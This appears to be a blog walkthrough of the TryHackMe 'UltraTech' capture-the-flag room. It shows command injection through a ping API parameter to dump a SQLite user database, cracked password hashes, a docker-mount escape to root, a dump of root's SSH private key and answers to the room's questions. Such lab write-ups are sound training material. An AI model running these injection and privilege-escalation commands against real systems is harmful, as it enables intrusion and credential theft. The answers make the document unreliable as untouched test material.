In this walk through, we will be going through the UltraTech room from Tryhackme. This room is rated as Medium on the platform and we have been contracted by UltraTech to pentest their infrastructure. It is a grey-box kind of assessment, the only information we have is the company’s name and their server’s IP address. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Ultratech-latest |
IPaddress | 10.10.224.181 |
Difficulty | Medium |
Objective | You have been contracted by UltraTech to pentest their infrastructure. It is a grey-box kind of assessment, the only information you have. is the company’s name and their server’s IP address. |
Enumeration:
- Started with a regular nmap, followed by a scan that covers all the TCP ports out there along with the services running on them. As a result found 4 ports and services running – FTP (21), SSH (22), 8081 (blackice-icecap) and 31331 (HTTP).
$ sudo nmap -sS -sV 10.10.224.181 Nmap scan report for 10.10.224.181 Host is up (0.23s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 53/tcp filtered domain Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
wh1terose@fsociety:~$ sudo nmap -sS -T4 -p- 10.10.224.181 Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-06 23:06 IST Nmap scan report for 10.10.224.181 Host is up (0.20s latency). Not shown: 65530 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 53/tcp filtered domain 8081/tcp open blackice-icecap 31331/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 530.64 seconds wh1terose@fsociety:~$ sudo nmap -sV -p 21,22,8081,31331 10.10.224.181 Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-06 23:18 IST Nmap scan report for 10.10.224.181 Host is up (0.20s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 8081/tcp open http Node.js Express framework 31331/tcp open http Apache httpd 2.4.29 ((Ubuntu)) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
- I tried to anonymous login on the FTP server however it failed.
- Next i moved to the web facing application. Performed some directory bruteforcing to reveals robots.txt.
- Moving along, gives us partners.html. The page holds a login form asking for credentials to proceed further.
- Going along with the source code reveals /js/api.js gives us our two API endpoints.
Initial Access:
- Next, we used both of the API endpoints to extract usernames and passwords from a misconfigured sqllite database.
wh1terose@fsociety:~/CTF/TryHackme/Ultratech$ curl -i 'http://10.10.224.181:8081/ping?ip=`ls`' HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Type: text/html; charset=utf-8 Content-Length: 49 ETag: W/"31-HlSQypQjJ8bvYzsasjt4yTZkt90" Date: Tue, 06 Jun 2023 18:26:57 GMT Connection: keep-alive ping: utech.db.sqlite: Name or service not known wh1terose@fsociety:~/CTF/TryHackme/Ultratech$ curl -i 'http://10.10.224.181:8081/ping?ip=`cat%20utech.db.sqlite`' HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Type: text/html; charset=utf-8 Content-Length: 147 ETag: W/"93-594eIY8lmtfDeu2ln6BdpbW24SI" Date: Tue, 06 Jun 2023 18:29:48 GMT Connection: keep-alive ���(r00tf357a0c52799563c7c7b76c1e7543a32)admin0d0ea5111e3c1def594c1684e3b9be84: Parameter string not correctly encoded
- Use hashes.com to crack the hashes of the below hash. Later, used the same credentials to login into the server via SSH.
r00t: f357a0c52799563c7c7b76c1e7543a32 admin: 0d0ea5111e3c1def594c1684e3b9be84
- r00t:n100906
Privilege Escalation:
- I imported linpeas to the target machine using wget from my local machine. Firing it shows a docker misconfiguration which we can leverage.
- Used GTFObins docker one-liner to escalate my privileges to the root!
r00t@ultratech-prod:/tmp$ docker images REPOSITORY TAG IMAGE ID CREATED SIZE bash latest 495d6437fc1e 4 years ago 15.8MB r00t@ultratech-prod:/tmp$ docker run -v /:/mnt --rm -it bash chroot /mnt sh # id uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo) # whoami root #
- Further, navigate to the user /root directory and found our final flag by peeking into the private key of the user.
# cd /root # ls -la total 40 drwx------ 6 root root 4096 Mar 22 2019 . drwxr-xr-x 23 root root 4096 Mar 19 2019 .. -rw------- 1 root root 844 Mar 22 2019 .bash_history -rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc drwx------ 2 root root 4096 Mar 22 2019 .cache drwx------ 3 root root 4096 Mar 22 2019 .emacs.d drwx------ 3 root root 4096 Mar 22 2019 .gnupg -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw------- 1 root root 0 Mar 22 2019 .python_history drwx------ 2 root root 4096 Mar 22 2019 .ssh -rw-rw-rw- 1 root root 193 Mar 22 2019 private.txt # cat private.txt # Life and acomplishments of Alvaro Squalo - Tome I Memoirs of the most successful digital nomdad finblocktech entrepreneur in the world. By himself. ## Chapter 1 - How I became successful # cd .ssh # ls -la total 16 drwx------ 2 root root 4096 Mar 22 2019 . drwx------ 6 root root 4096 Mar 22 2019 .. -rw------- 1 root root 0 Mar 19 2019 authorized_keys -rw------- 1 root root 1675 Mar 22 2019 id_rsa -rw-r--r-- 1 root root 401 Mar 22 2019 id_rsa.pub # cat id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAuDSna2F3pO8vMOPJ4l2PwpLFqMpy1SWYaaREhio64iM65HSm sIOfoEC+vvs9SRxy8yNBQ2bx2kLYqoZpDJOuTC4Y7VIb+3xeLjhmvtNQGofffkQA jSMMlh1MG14fOInXKTRQF8hPBWKB38BPdlNgm7dR5PUGFWni15ucYgCGq1Utc5PP NZVxika+pr/U0Ux4620MzJW899lDG6orIoJo739fmMyrQUjKRnp8xXBv/YezoF8D hQaP7omtbyo0dczKGkeAVCe6ARh8woiVd2zz5SHDoeZLe1ln4KSbIL3EiMQMzOpc jNn7oD+rqmh/ygoXL3yFRAowi+LFdkkS0gqgmwIDAQABAoIBACbTwm5Z7xQu7m2J tiYmvoSu10cK1UWkVQn/fAojoKHF90XsaK5QMDdhLlOnNXXRr1Ecn0cLzfLJoE3h YwcpodWg6dQsOIW740Yu0Ulr1TiiZzOANfWJ679Akag7IK2UMGwZAMDikfV6nBGD wbwZOwXXkEWIeC3PUedMf5wQrFI0mG+mRwWFd06xl6FioC9gIpV4RaZT92nbGfoM BWr8KszHw0t7Cp3CT2OBzL2XoMg/NWFU0iBEBg8n8fk67Y59m49xED7VgupK5Ad1 5neOFdep8rydYbFpVLw8sv96GN5tb/i5KQPC1uO64YuC5ZOyKE30jX4gjAC8rafg o1macDECgYEA4fTHFz1uRohrRkZiTGzEp9VUPNonMyKYHi2FaSTU1Vmp6A0vbBWW tnuyiubefzK5DyDEf2YdhEE7PJbMBjnCWQJCtOaSCz/RZ7ET9pAMvo4MvTFs3I97 eDM3HWDdrmrK1hTaOTmvbV8DM9sNqgJVsH24ztLBWRRU4gOsP4a76s0CgYEA0LK/ /kh/lkReyAurcu7F00fIn1hdTvqa8/wUYq5efHoZg8pba2j7Z8g9GVqKtMnFA0w6 t1KmELIf55zwFh3i5MmneUJo6gYSXx2AqvWsFtddLljAVKpbLBl6szq4wVejoDye lEdFfTHlYaN2ieZADsbgAKs27/q/ZgNqZVI+CQcCgYAO3sYPcHqGZ8nviQhFEU9r 4C04B/9WbStnqQVDoynilJEK9XsueMk/Xyqj24e/BT6KkVR9MeI1ZvmYBjCNJFX2 96AeOaJY3S1RzqSKsHY2QDD0boFEjqjIg05YP5y3Ms4AgsTNyU8TOpKCYiMnEhpD kDKOYe5Zh24Cpc07LQnG7QKBgCZ1WjYUzBY34TOCGwUiBSiLKOhcU02TluxxPpx0 v4q2wW7s4m3nubSFTOUYL0ljiT+zU3qm611WRdTbsc6RkVdR5d/NoiHGHqqSeDyI 6z6GT3CUAFVZ01VMGLVgk91lNgz4PszaWW7ZvAiDI/wDhzhx46Ob6ZLNpWm6JWgo gLAPAoGAdCXCHyTfKI/80YMmdp/k11Wj4TQuZ6zgFtUorstRddYAGt8peW3xFqLn MrOulVZcSUXnezTs3f8TCsH1Yk/2ue8+GmtlZe/3pHRBW0YJIAaHWg5k2I3hsdAz bPB7E9hlrI0AconivYDzfpxfX+vovlP/DdNVub/EO7JSO+RAmqo= -----END RSA PRIVATE KEY-----
Task 1 – Deploy the machine
Task 2 – It’s enumeration time!
Question 1 – Which software is using the port 8081?
Node.js
Question 2 – Which other non-standard port is used?
31331
Question 3 – Which software using this port?
Apache
Question 4 – Which GNU/Linux distribution seems to be used?
Ubuntu
Question 5 – The software using the port 8081 is a REST api, how many of its routes are used by the web application?
2
Task 3 – Let the fun begin
Question 1 – There is a database lying around, what is its filename?
utech.db.sqlite
Question 2 – What is the first user’s password hash?
f357a0c52799563c7c7b76c1e7543a32
Question 3 – What is the password associated with this hash?
n100906
Task 4 – The root of all evil
Question 1 – What are the first 9 characters of the root user’s private SSH key?
MIIEogIBA
Also Read: Tryhackme – Traffic Analysis Essentials
Conclusion:
So that was “UltraTech” for you. Let’s sum it up quickly. We started off with a regular nmap scan with version detection, found the following ports opened – FTP (21), SSH (22), 8081 (blackice-icecap) and 31331 (HTTP). Next, we found directories in robots.txt and utech_sitemap.txt file. Over there, we found a portal named Private Partners Area. Checking the page source code reveals two API endpoints. Next, we used both of the API endpoints to extract usernames and passwords from a misconfigured sqllite database. Cracked the hashed password and logged into the server using SSH. At last for the privilege escalation used misconfigured docker instance to get the root. On that note, i will take your leave and will see you in next one, Till then “Hack the Planet”.